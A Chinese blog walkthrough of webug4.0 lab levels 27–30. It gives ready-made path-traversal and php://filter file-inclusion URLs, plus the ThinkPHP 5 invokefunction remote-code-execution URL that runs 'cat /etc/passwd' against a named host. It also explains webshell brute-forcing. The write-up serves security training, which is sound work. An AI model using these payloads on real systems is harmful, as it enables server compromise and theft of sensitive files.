webug4.0最后几篇27-30

27、文件包含漏洞

1、打开靶场,如下,请不要忘了来自网址的关怀。即这个网址是不是让你可以浮想联翩了。
在这里插入图片描述
2、读取敏感文件,boot.ini(这个是windows系统的)
关于其它系统敏感文件的链接请查看:https://blog.csdn.net/nex1less/article/details/100009331

http://XXXXXX/control/more/file_include.php?filename=../../../../boot.ini

3、通过php伪协议查看index.php文件。

http://XXXXXXXX/control/more/file_include.php?filename=php://filter/read=convert.base64-encode/resource=../../index.php

解密后:在线加密与解密
webug4.0最后几篇27-30_第1张图片

28、命令执行

由于数据库配置不正确,因此访问的时候需要的应该访问:

http://x.x.x.x/xxx/control/more/tp5/public/index.php

找了很久,依旧只是找到一点点线索,还是没找到该怎么配置这个网站。希望我的线索对大牛可以有一点帮助。

打开F12界面。定位28关“打开靶场”按钮的链接。我们可以发现它不存在。将他改为/control/more/tp5/public/index.php 即可。
webug4.0最后几篇27-30_第2张图片

链接如下:
webug4.0最后几篇27-30_第3张图片
可见是thikephp框架的网站,直接查文件:system和cat /etc/passwd。

http://j.smatrix.org:20000/control/more/tp5/public/index.php
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /etc/passwd

在这里插入图片描述

29、webshell爆破

1.什么是webshell?
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。

2.为什么webshell需要爆破?
因为那个webshell文件可能是你发现了他在网站上的路径,但那个是别的黑客入侵过这个网站上传的,所以你没有密码,如果你能爆破成功,相当于不用利用漏洞免费getshell了。

来自:https://blog.csdn.net/nex1less/article/details/100009614

由于靶场没有配置好,因此在这里我找不到这个靶场在哪里。
本关的攻略请查看:https://blog.csdn.net/nex1less/article/details/100009614

30、ssrf

本关请查看链接:https://blog.csdn.net/nex1less/article/details/100009629

你可能感兴趣的:(#,webug4.0)